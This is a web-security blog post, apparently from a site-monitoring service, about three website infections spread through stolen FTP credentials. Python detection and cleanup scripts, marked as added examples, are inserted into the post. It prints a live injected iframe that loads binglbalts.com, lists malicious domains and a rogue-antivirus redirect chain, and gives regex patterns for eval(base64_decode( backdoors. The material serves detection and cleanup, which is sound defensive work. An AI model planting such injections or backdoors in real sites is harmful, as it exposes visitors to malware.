WeWatchYourWebsite

"so you don't have to!"

Blender type website infections

We’ve been seeing a lot of recent website infections that use highly obfuscated JavaScript code which decodes to a domain: yourblenderparts.ru:8080.

Many other domains are used as well such as:

  • superbblender.ru
  • thesuperpager.ru
  • superroadmap.ru
  • supersupermall.ru
  • theblendertv.ru
  • theblendertutorial.ru
  • excellentblender.ru
  • thechocolateweb.ru
  • whosaleonline.ru
  • worldmusicmagazine.ru
  • thelaceweb.ru
  • webdesktopnet.ru
  • sugaryhome.ru
  • homesaleplus.ru
  • greatwebradio.ru
  • avattop.ru
  • recentmexico.ru
  • cobalttrueblue.ru
  • webnetenglish.ru
  • newusaguide.ru
  • livesitedesign.ru
  • sitemape.ru
  • samuest.ru
  • pokesack.ru
  • royalbling.ru
  • retireterrify.ru
  • thesuperexchange.ru
  • snoreflash.ru
  • forredtag.ru
  • newvillagefresh.ru
  • hotnewgirl.ru
  • yoursuperpool.ru
  • buytheblender.ru

The infectious code we found was at the bottom of index.php files, wrapped in <script></script> tags, and generally the same code was found at the bottom of various .js (JavaScript) files without the script tags.

In the obfuscated code there’s usually a number of strings that look like:

if (a!='' && a='b'){a=null}

There are of course variances to this. The variable ‘a’ can be any letter or even an underscore “_” and may consist of two letters, either upper or lowercase. The variable ‘b’ can be any letter or underscore, can actually be one or two characters, and may or may not be uppercase. Other than that, they’re exactly the same. :)

This format will be found in the malscript in a number of places but obviously with different variables.

The string of characters that all this code works on can be in hex format, for instance:

var I="\x68\x74\x74\x70\x3a\x2f\x2f…" (which is actually "http://")

or it might be something like:

var M="hOtFtOp:O/O/…" (which, when you remove the uppercase characters, is actually "http://")

In the obfuscated malscript there is also a number of variable declarations. You’ll find things like:

  • var vM=new Array()
  • var j=new String() (sometimes with a value inside the parenthesis)
  • var Z=window
  • var K=new Date()
  • var G=new RegExp(…)
  • var QF=document

When I see a variable declaration like var Z=window or var QF=document, I know that somewhere in the malscript I’ll see something like Z.location or QF.write. Aliasing window and document behind short variable names is a common obfuscation technique of the hackers.
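To show how the indicators above can be picked out of a script automatically, here is an added example (not code from the original post): a small Python checker that spots the window/document aliases, counts the filler comparisons, and decodes both the hex-escaped and the mixed-case string forms back to the URL they hide. The sample script it runs on is constructed to match the shapes described above (the two domains in it are taken from the list in this post); the regexes and function names are my own.

```python
import re

# Constructed sample in the shape of the obfuscated malscript described above:
# window/document aliases, filler comparisons, a hex-escaped string and a
# mixed-case string. It is not a real capture.
SAMPLE_MALSCRIPT = r"""
var Z=window;var QF=document;var vM=new Array();var K=new Date();
if (aB!='' && aB='x'){aB=null}
var I="\x68\x74\x74\x70\x3a\x2f\x2f\x79\x6f\x75\x72\x62\x6c\x65\x6e\x64\x65\x72\x70\x61\x72\x74\x73\x2e\x72\x75\x3a\x38\x30\x38\x30";
var M="hOtFtOp:O/O/sUuPpEeRrBbBbLlEeNnDdEeRr.rLu";
if (_!='' && _='Q'){_=null}
"""

# "var Z=window;" / "var QF=document;" -> aliases later used as Z.location or QF.write
ALIAS_RE = re.compile(r"var\s+([A-Za-z_$][\w$]*)\s*=\s*(window|document)\s*;")

# Filler of the form  if (a!='' && a='b'){a=null}  with one- or two-character names
FILLER_RE = re.compile(
    r"if\s*\(\s*([A-Za-z_]{1,2})\s*!=\s*''\s*&&\s*\1\s*=\s*'[A-Za-z_]{1,2}'"
    r"\s*\)\s*\{\s*\1\s*=\s*null\s*\}"
)

# Double-quoted string literals (the forms quoted in the post use double quotes)
STRING_RE = re.compile(r'"([^"\n]*)"')
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_hex_string(s):
    """Turn \\x68\\x74... escapes into the characters they encode."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def strip_uppercase(s):
    """Drop the uppercase letters inserted as noise: hOtFtOp:O/O/ -> http://"""
    return "".join(c for c in s if not c.isupper())


def find_indicators(script):
    """Collect aliases, filler count and every string that decodes to a URL."""
    aliases = dict(ALIAS_RE.findall(script))
    filler_count = len(FILLER_RE.findall(script))
    decoded_urls = []
    for literal in STRING_RE.findall(script):
        # Try both decodings; a literal only counts if one of them yields a URL.
        for candidate in (decode_hex_string(literal), strip_uppercase(literal)):
            if "http://" in candidate and candidate not in decoded_urls:
                decoded_urls.append(candidate)
    return {"aliases": aliases, "filler_count": filler_count,
            "decoded_urls": decoded_urls}


def looks_like_blender_malscript(script):
    """All three indicator families present -> worth a manual look."""
    ind = find_indicators(script)
    return bool(ind["aliases"]) and ind["filler_count"] >= 1 and bool(ind["decoded_urls"])


if __name__ == "__main__":
    print(find_indicators(SAMPLE_MALSCRIPT))
```

Run it over the tail of a suspect index.php or .js file; the decoded URL list is what you compare against the domain list above, and a hit on all three indicator families is a strong reason to pull the file for inspection.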

In all the cases we’ve worked on with this type of infection, it’s been the result of a virus that has stolen the FTP passwords from a PC with FTP access to the website.

We’ve written about this before, but here are the steps to follow to prevent this from happening again.

  1. Install a new anti-virus program. The reason is that it’s obvious that the current anti-virus software didn’t detect anything. Often times these viruses “learn” how to evade detection from the currently installed anti-virus software. Therefore, something new and different is needed to find and remove it. Many have had good results with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software).
  2. Change all FTP passwords. I recommend creating a new FTP account for everyone or for every PC that will be accessing the website. Then be sure that FTP logging is activated. This is important. If your website gets infected again, you can look in the logs to see who has the virus. If there’s a user named john and his username shows up in the logs from somewhere across the world, you can safely assume that it’s his username that’s been compromised.
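Step 2 turns the FTP log into the evidence for which account was compromised. As an added example (not the post’s own code), here is a Python checker that parses login lines, lists the addresses each account has connected from, and flags any login from an address that account is not expected to use. The log layout (`date time LOGIN user ip`) is a constructed simplification rather than any particular FTP server’s format, and the sample entries use documentation IP ranges; adapt the regex to your server’s log format.

```python
import re
from datetime import datetime

# Constructed log lines in a simplified "date time LOGIN user ip" layout; they are
# not the output of a specific FTP server. 192.0.2.x, 198.51.100.x and 203.0.113.x
# are documentation addresses.
SAMPLE_FTP_LOG = """\
2010-04-19 08:02:11 LOGIN john 192.0.2.10
2010-04-19 08:30:45 LOGIN mary 192.0.2.11
2010-04-19 23:14:02 LOGIN john 198.51.100.77
2010-04-20 01:05:19 LOGIN john 203.0.113.9
2010-04-20 09:00:00 LOGIN mary 192.0.2.12
garbage line that the parser should ignore
"""

# One FTP account per PC makes this table easy to keep: each account should only
# ever appear from the addresses that PC uses.
EXPECTED_IPS = {"john": {"192.0.2.10"}, "mary": {"192.0.2.11", "192.0.2.12"}}

LOGIN_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) LOGIN (\S+) (\d{1,3}(?:\.\d{1,3}){3})$"
)


def parse_logins(text):
    """Return (timestamp, user, ip) for every line that matches the login layout."""
    logins = []
    for line in text.splitlines():
        m = LOGIN_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            logins.append((ts, m.group(2), m.group(3)))
    return logins


def ips_per_user(logins):
    """Sorted list of distinct source addresses seen for each account."""
    seen = {}
    for _, user, ip in logins:
        seen.setdefault(user, set()).add(ip)
    return {user: sorted(ips) for user, ips in seen.items()}


def flag_unexpected_logins(logins, expected):
    """Logins from an address the account is not expected to use (unknown accounts
    have no expected addresses, so every login of theirs is flagged)."""
    flagged = []
    for ts, user, ip in logins:
        if ip not in expected.get(user, set()):
            flagged.append((ts.strftime("%Y-%m-%d %H:%M:%S"), user, ip))
    return flagged


def compromised_accounts(logins, expected):
    """Accounts with at least one unexpected login: these are the passwords to rotate
    and the PCs to scan."""
    return sorted({user for _, user, _ in flag_unexpected_logins(logins, expected)})


if __name__ == "__main__":
    logins = parse_logins(SAMPLE_FTP_LOG)
    for entry in flag_unexpected_logins(logins, EXPECTED_IPS):
        print("unexpected login:", *entry)
    print("accounts to treat as compromised:", compromised_accounts(logins, EXPECTED_IPS))
```

In the sample, john’s account shows up from two addresses outside his expected set within a few hours, which is exactly the “username from somewhere across the world” pattern described above; mary’s logins all come from her known addresses.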

That’s it. 2 steps. It’s easier to prevent your site from being infected than it is to recover from an addiction.

If you have more domains to add to this or would like to comment, please do so. You can leave a comment below or you can email direct at traef@wewatchyourwebsite.com

Until next time…

The recent "Movie Review" infections

Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies!

The typical infection is a five letter .php file such as:

  • juqip.php
  • kirqf.php
  • wxtrg.php
  • mtywo.php
  • tijox.php

and other file names like these. The common denominator is the five-letter file name. From what we’ve seen, the file name doesn’t start with a vowel, and there appears to be a different file name for each website: if you were to Google tijox.php, you’d only see it on one website.

For each of these sites, there is a folder named “./files”. The reason for the dot before the folder name is to hide it from many programs. For instance, in WS_FTP by Ipswitch (the FTP program I use), you have to specify that you want to see all listings that begin with a dot; by default, WS_FTP won’t even show this folder. The same is true for Linux: a default directory listing won’t show a folder whose name begins with a dot.

All the files in the “./files” folder are put there by the hackers. The majority of them are movie reviews, but there’s also .html files in there about the Buffalo Sabres hockey team, various “Lord of War” files, Texas Lottery Pick 3 and various other frequently searched terms.

We have seen a lot of them using search terms that reference “lord of war”, but other search terms used are:

  • 3 10 To Yuma Soundtrack
  • death of a cheerleader wiki
  • tx lottery pick 3
  • sabres hockey
  • strike force results hershel walker
  • strike force nashville presale code
  • kesha snl
  • strangers on a train movie
  • knights templar
  • freshman fall imdb
  • dazed and confused cast
  • strangers on a train patricia highsmith
  • luci baines johnson pictures
  • bernadette protti pictures
  • dan henderson vs jake shields fight video
  • kelly pavlik news
  • the good shepherd imdb
  • acm awards 2010 voting
  • doctor who victory of the daleks download
  • dazed and confused lyrics
  • amstel gold race 2010
  • roma airport
  • farley granger imdb
  • tao las vegas
  • mastiff
  • josh selby basketball
  • king mo vs mark kerr
  • pavlik vs martinez undercard
  • american bulldog
  • kelly pavlik vs miguel espino
  • kelly pavlik wiki
  • sergio martinez next fight
  • joe mather girlfriend
  • batman and robin comic
  • bernadette protti
  • guillain barre syndrome wikipedia
  • shake weight reviews does it work
  • strikeforce results january 30
  • the hitcher movie
  • psn code generator
  • amanda peterson photos
  • elearning
  • tea leoni
  • patrick dempsey
  • unemployment
  • and many, many others

However, the really interesting information is in the query string. The query string has the “?” after the .php file name, and then it uses a variety of identifiers. Sometimes it’s a single letter; other times we’ve seen words like:

  • sell
  • in
  • post
  • off
  • do
  • topic
  • page
  • pageid
  • go

These are followed by the search term. In the search term, the spaces are converted to %20, possibly as a further attempt to obfuscate their work.

We found that the majority of sites with this infection have already been found by Google and labeled, “this site may harm your computer”. Unfortunately not all of them have been flagged yet. I say unfortunately, because it seems as though that’s the way most website owners or webmasters find out that a website has been infected – by Google flagging it and sending an email to the email addresses listed in the Google Webmaster Tools.

If you were to Google, “the hitcher movie”, many listings appear that have the warning this site may harm your computer. Some don’t. Anyone looking to find information about “the hitcher movie” might click on one of the sites that hasn’t been labeled by Google yet and here’s what would happen.

First, inside the “./files” folder, there is typically a file named “b.log”. This file contains the website that these files redirect to when clicked on only from a Google Search Results Page (SERP).

For instance in one investigation the b.log file looked like this:

kqx7ea.xorg.pl|1271657010

Anyone clicking on a Google SERP for this particular website would be directed to:

http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN http://kdsproductions.com/ekctj.php?p=the%20hitcher%20movie

Which then redirects to:

http://www4.nomikals2.com/?p=p52dcWltbV%2FRlsijZFaZp29e2KHObWOXk5ecmmFoZG6a http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN

Which redirects to:

http://www2.scanprotection34p.net

Which wants to install a fake (rogue) anti-virus program on your PC.

What to look for

Look in your root folder for your website. It might be public_html or just html. Look for any .php files that have five letters that look totally random. From what we can tell, they are totally random. Then make sure that your FTP software is showing hidden files and folders. Look for a folder named “files” and see if there aren’t a whole lot of .html files in there that you’re quite certain, you didn’t put there.

What to do

If you do find these instances on any of your websites, remove the ./files folder and the five letter randomly named .php file. There may also be .php files installed in your images folders. Search all files for the string:

eval(base64_decode( followed by a long list of characters. Don’t just delete this file, but examine it. If you need help decoding it, please email at: traef@wewatchyourwebsite.com
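The “What to look for” checks above (a random five-letter .php file in the web root, a dot-prefixed folder full of .html files, .php files sitting in image folders, and the b.log redirect record) can be run against a downloaded copy of the site. Here is an added Python scanner (not the post’s own tooling) that does exactly that. It assumes the hidden folder is literally named `.files`, as the explanation of the leading dot implies, and it builds a constructed sample web root in a temporary directory so it can be run offline; the file names in the sample (tijox.php, gifimg.php, the b.log line) are the ones quoted in these posts.

```python
import os
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

RANDOM_PHP_RE = re.compile(r"[a-z]{5}\.php")
VOWELS = set("aeiou")
IMAGE_DIR_NAMES = {"images", "img"}


def suspicious_php_names(root, allowlist=()):
    """Five-letter lowercase .php files in the web root whose name does not start
    with a vowel. index.php and admin.php start with vowels, so they pass; anything
    legitimate that trips the rule (e.g. a real login.php) goes in the allowlist."""
    root = Path(root)
    return sorted(
        p.name for p in root.iterdir()
        if p.is_file() and RANDOM_PHP_RE.fullmatch(p.name)
        and p.name[0] not in VOWELS and p.name not in allowlist
    )


def hidden_dirs_with_html(root, min_html=5):
    """Dot-prefixed directories (hidden in default FTP and ls listings) that hold
    many .html files you did not put there."""
    root = Path(root)
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            if d.startswith("."):
                full = Path(dirpath) / d
                n_html = sum(1 for f in full.iterdir() if f.suffix == ".html")
                if n_html >= min_html:
                    found.append((full.relative_to(root).as_posix(), n_html))
    return sorted(found)


def parse_b_log(path):
    """b.log holds 'redirect-host|unix-timestamp'; return the host and a readable UTC time."""
    host, ts = Path(path).read_text().strip().split("|", 1)
    when = datetime.fromtimestamp(int(ts), tz=timezone.utc)
    return host, when.strftime("%Y-%m-%d %H:%M:%S UTC")


def php_in_image_dirs(root):
    """PHP files inside image folders, which should contain no code at all."""
    root = Path(root)
    hits = []
    for dirpath, _, filenames in os.walk(root):
        if Path(dirpath).name.lower() in IMAGE_DIR_NAMES:
            hits.extend((Path(dirpath) / f).relative_to(root).as_posix()
                        for f in filenames if f.endswith(".php"))
    return sorted(hits)


def scan_site(root):
    """Combine the checks and, for each hidden folder, read its b.log if present."""
    root = Path(root)
    report = {
        "random_php": suspicious_php_names(root),
        "hidden_html_dirs": hidden_dirs_with_html(root),
        "php_in_images": php_in_image_dirs(root),
        "redirect_targets": [],
    }
    for rel, _ in report["hidden_html_dirs"]:
        b_log = root / rel / "b.log"
        if b_log.is_file():
            report["redirect_targets"].append(parse_b_log(b_log))
    return report


def build_sample_site():
    """Constructed web root mimicking the layout described in the post (no real payloads)."""
    root = Path(tempfile.mkdtemp(prefix="siteroot_"))
    (root / "index.php").write_text("<?php echo 'legitimate front page'; ?>\n")
    (root / "tijox.php").write_text("<?php /* constructed stand-in for the dropped file */ ?>\n")
    hidden = root / ".files"
    hidden.mkdir()
    for i in range(6):
        (hidden / f"review{i}.html").write_text("<html>constructed filler page</html>\n")
    (hidden / "b.log").write_text("kqx7ea.xorg.pl|1271657010\n")
    images = root / "images"
    images.mkdir()
    (images / "logo.gif").write_bytes(b"GIF89a")
    (images / "gifimg.php").write_text("<?php /* constructed stand-in for a dropped file */ ?>\n")
    return root


if __name__ == "__main__":
    print(scan_site(build_sample_site()))
```

Point `scan_site` at the local copy of your public_html (or html) folder instead of the sample; everything it reports is a candidate to examine, not something to delete blindly, and the b.log timestamp gives you the date to look for in the FTP log.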

In all our cases, we’ve found that the culprit was a virus on a PC with FTP access to the infected website. We’ve seen the FTP logs and we’ve identified the IP addresses that some of these files came from.

As with many website infections, the first step is change all FTP passwords and do not save them on any PC – yet.

Then obviously remove all the files identified above.

Next, install a different anti-virus program on your PC. The reason is that these viruses and trojans know how to evade detection of the anti-virus program that’s already been installed when the virus first infected the PC. In order to find and remove the viruses you have to install a different anti-virus program.

Many have had good success with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software). If you’re already using one of these, then try one of the other two – it has to be different.

Once you’ve found and removed the virus or trojan, you can then use your FTP program with the new passwords and feel safe.

The last thing to do is to Request a Review from your Google Webmaster Tools – if your site has been tagged with the warning “this site may harm your computer”.

All of our clients prevented this warning by our monitoring service. While we couldn’t prevent their PCs from getting infected, we could detect when their websites changed. We immediately removed the files and alerted them to take the above steps to clean their PCs. Their websites were never blacklisted by Google because of our automated cleaning process.

If you’d like to be protected, please send me an email: traef@wewatchyourwebsite.com

If you have any comments, please feel free to register and let me know your thoughts or experience with this type of infection.

Attack of the binglbalts

We started seeing a lot of websites infected with a malscript that looks like:

<iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '></iframe>

In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.

We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.

It turns out the cause of these infections has been stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com, and we can see the IP addresses the infection is coming from.

To clean this, first change all FTP passwords.

Second, you’ll have to download your entire site onto your PC or Mac. Then use grepWin and use this as the search string:

iframe\s*frameborder=\"0\" onload=\' if \(\!this\.src\)\s*\{\s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;\s*\} \'><\/iframe

For the replacement string in the field "Replace with:", leave that field blank. Then set the following:

Search case-sensitive: unchecked
Dot matches newline: checked
Create backup files: checked
Treat files as UTF8: unchecked

Include system items: checked
Include hidden items: checked
Include subfolders: checked

First hit the Search button. Just to see the files in the Search results window. Then hit Replace. This will find and remove the malscript and create a backup of the original file with the malscript.

This will find all files containing that string and remove it from them.

Then copy the cleaned files to your website.

In a few instances, we've been seeing some .php backdoors associated with binglbalts.com infections. These are the usual backdoors we see, with this code in them:

eval(base64_decode(...

To be sure you don't have that in any of your files use grepWin and this search string:

<\?php\s*eval\(base64_decode\([\'|\"].*?[\'|\"]\)\); \?>

Examine any files that show up in your Search results window for grepWin. If that's the only line in the file, then just delete the file from your website. If that's not the only line in your webpage, then use grepWin to Replace that string with nothing and you should be clean. Often times we've found this string in gifimg.php or mailcheck.php.
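The two grepWin searches above, and the “search all files for eval(base64_decode(” step from the Movie Review post, translate directly into Python regexes. The added example below (my own code, not the post’s) applies the same patterns with the same settings (case-sensitive, dot matches newline) to constructed file contents: it strips the binglbalts iframe and returns how many were removed, and it sorts an eval(base64_decode( hit into “delete the file” versus “strip the line” using the rule given above. The sample contents are constructed; the base64 payload in them is just “Zm9v” (“foo”), not a real backdoor.

```python
import re

# grepWin settings from the post: case-sensitive search, "Dot matches newline" -> re.DOTALL
IFRAME_RE = re.compile(
    r'<iframe\s*frameborder="0" onload=\' if \(!this\.src\)\s*\{\s*'
    r'this\.src="http://binglbalts\.com/grep/"; this\.height=0; this\.width=0;\s*\} \'></iframe>',
    re.DOTALL,
)
# <?php eval(base64_decode('...')); ?> with either quote style around the payload
EVAL_B64_RE = re.compile(r"<\?php\s*eval\(base64_decode\(['\"].*?['\"]\)\);\s*\?>", re.DOTALL)

# Constructed file contents. "Zm9v" is base64 for "foo": a placeholder, not a payload.
FOOTER_SAMPLE = (
    '<div id="footer">Copyright 2010 Example Site</div>\n'
    "<iframe frameborder=\"0\" onload=' if (!this.src) { "
    "this.src=\"http://binglbalts.com/grep/\"; this.height=0; this.width=0; } '></iframe>\n"
)
BACKDOOR_ONLY_SAMPLE = "<?php eval(base64_decode('Zm9v')); ?>\n"
MIXED_SAMPLE = (
    "<?php\n// mail checker (constructed stand-in for legitimate code)\n?>\n"
    '<?php eval(base64_decode("Zm9v")); ?>\n'
    "<p>done</p>\n"
)


def mentions_base64_eval(content):
    """First-pass substring check matching the 'eval(base64_decode(' search in the post."""
    return "eval(base64_decode(" in content


def strip_binglbalts_iframe(content):
    """Remove every occurrence of the injected iframe; returns (cleaned, count)."""
    return IFRAME_RE.subn("", content)


def classify_base64_backdoor(content):
    """'clean' if no hit; 'delete_file' if the eval line is the whole file;
    'strip_line' if it is embedded in an otherwise legitimate file."""
    m = EVAL_B64_RE.search(content)
    if not m:
        return "clean"
    if content.strip() == m.group(0):
        return "delete_file"
    return "strip_line"


def strip_base64_eval(content):
    """The 'Replace with nothing' action for the embedded case; returns (cleaned, count)."""
    return EVAL_B64_RE.subn("", content)


if __name__ == "__main__":
    cleaned, n = strip_binglbalts_iframe(FOOTER_SAMPLE)
    print(f"removed {n} iframe(s):\n{cleaned}")
    for name, sample in (("gifimg.php", BACKDOOR_ONLY_SAMPLE), ("mailcheck.php", MIXED_SAMPLE)):
        print(name, "->", classify_base64_backdoor(sample))
```

As with grepWin, run the search first and look at every hit before replacing anything, and keep a backup of each file you rewrite; the classification only decides between the two actions the post describes, it does not decide whether a hit is legitimate.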

If you have any questions or comments, please feel free to post them. Or you can send me an email at: traef@wewatchyourwebsite.com